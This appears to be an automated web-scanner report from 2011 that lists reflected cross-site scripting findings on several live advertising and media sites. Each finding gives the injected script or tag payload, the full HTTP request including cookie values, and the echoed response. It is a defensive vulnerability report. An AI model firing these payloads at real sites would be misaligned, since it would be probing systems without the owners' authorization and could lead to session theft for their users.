<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://91e2b
94ca8568822.avonrepresentative.co
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 72 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.doubleclick.net/adj/buz.egotastic/ros [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/buz.egotastic/ros

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e326f'%3balert(1)//39e46fbeeaa was submitted in the pos parameter. This input was echoed as e326f';alert(1)//39e46fbeeaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/buz.egotastic/ros;pos=e326f'%3balert(1)//39e46fbeeaa HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 378
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 31 Mar 2011 19:26:36 GMT
Expires: Thu, 31 Mar 2011 19:26:36 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3adb/0/0/%2a/v;232951628;5-0;0;47830440;4307-300/250;41075461/41093248/1;;~okv=;pos=e326f';alert(1)//39e46fbeeaa;~aopt=2/0/ff/0;~sscs=%3fhttp://join.mrskin.com/track/NTIyODI6MTU5OjE/tour/">
...[SNIP]...

2.2. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26a"><script>alert(1)</script>65d90458377 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM7e26a"><script>alert(1)</script>65d90458377/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1329664833@x23?USNetwork/Dominos_11Q1_247RM_CPC1_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; NatureMade=ZapTraderB3; Dell=247B3; NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=3375925924; session=1301598576|1301598576

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:10:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM7e26a"><script>alert(1)</script>65d90458377/DLX/2092214976/x71/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><IMG SR
...[SNIP]...

2.3. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b95de"><script>alert(1)</script>9474efaa04a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXb95de"><script>alert(1)</script>9474efaa04a/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1329664833@x23?USNetwork/Dominos_11Q1_247RM_CPC1_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; NatureMade=ZapTraderB3; Dell=247B3; NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=3375925924; session=1301598576|1301598576

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:10:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXb95de"><script>alert(1)</script>9474efaa04a/1996046596/x71/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><IMG SR
...[SNIP]...

2.4. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1688"><script>alert(1)</script>7356afd5454 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71d1688"><script>alert(1)</script>7356afd5454 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1329664833@x23?USNetwork/Dominos_11Q1_247RM_CPC1_728
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; NatureMade=ZapTraderB3; Dell=247B3; NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=3375925924; session=1301598576|1301598576

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:10:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/555974321/x71d1688"><script>alert(1)</script>7356afd5454/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><IMG SRC
...[SNIP]...

2.5. http://canada.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://canada.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bc43"><script>alert(1)</script>9ba9360e203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3bc43"><script>alert(1)</script>9ba9360e203=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:34:52 GMT
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEV PSA PSD IVA IVDi CONi OUR SAMi LEG PHY ONL UNI PUR FIN COM NAV PRE LOC INT"
X-Powered-By: ASP.NET
Content-Length: 214
Content-Type: text/html
Cache-control: private


   <HTML>
       <HEAD>
           <TITLE>canada.com</TITLE>
           <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.canada.com/favicon.ico?3bc43"><script>alert(1)</script>9ba9360e203=1">
       <BODY>
       
       </BOD
...[SNIP]...

2.6. http://egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63db6<script>alert(1)</script>72d061924d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico63db6<script>alert(1)</script>72d061924d9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:25:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://egotastic.com/favicon.ico63db6<script>alert(1)</script>72d061924d9" seems to be missing.</p>
...[SNIP]...

2.7. http://egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78932"><a>bea2c30f94c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico78932"><a>bea2c30f94c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:25:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO78932"><A>BEA2C30F94CEDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO78932">
...[SNIP]...

2.8. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a689"><a>e51bf13509b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C9a689"><a>e51bf13509b/contact-form/gbcf_styles.css HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
RGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2WGPMZ3EALERT(DOCUMENTHR2WGPMZCOOKIE)HR2WGPMZ3C9A689"><A>E51BF13509BHR2WGPMZCONTACTHR2WGPMZFORMHR2WGPMZGBCFHR2WGPMZSTYLESHR2WGPMZCSSEDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGP
...[SNIP]...

2.9. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d3f57<script>alert(1)</script>0652424283f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3Cd3f57<script>alert(1)</script>0652424283f/contact-form/gbcf_styles.css HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3Cd3f57<script>alert(1)</script>0652424283f/contact-form/gbcf_styles.css" seems to be missing.</p>
...[SNIP]...

2.10. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d55d2<script>alert(1)</script>14614dda404 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-formd55d2<script>alert(1)</script>14614dda404/gbcf_styles.css HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-formd55d2<script>alert(1)</script>14614dda404/gbcf_styles.css" seems to be missing.</p>
...[SNIP]...

2.11. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ad7"><a>27dd6a4b7b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form48ad7"><a>27dd6a4b7b8/gbcf_styles.css HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO63DB6HR2WGPMZ3CSCRIPTHR2WGPMZ3EALERT(DOCUMENTHR2WGPMZCOOKIE)HR2WGPMZ3CHR2WGPMZCONTACTHR2WGPMZFORM48AD7"><A>27DD6A4B7B8HR2WGPMZGBCFHR2WGPMZSTYLESHR2WGPMZCSSEDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPM
...[SNIP]...

2.12. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35010<script>alert(1)</script>70cf5c840a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css35010<script>alert(1)</script>70cf5c840a0 HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css35010<script>alert(1)</script>70cf5c840a0" seems to be missing.</p>
...[SNIP]...

2.13. http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://egotastic.com
Path:   /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9c8"><a>36d0b47acb3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/contact-form/gbcf_styles.css7c9c8"><a>36d0b47acb3 HTTP/1.1
Host: egotastic.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=19269292.1301599610.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=19269292.2008620726.1301599610.1301599610.1301599610.1; __utmc=19269292; __utmb=19269292.1.10.1301599610

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 19:26:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

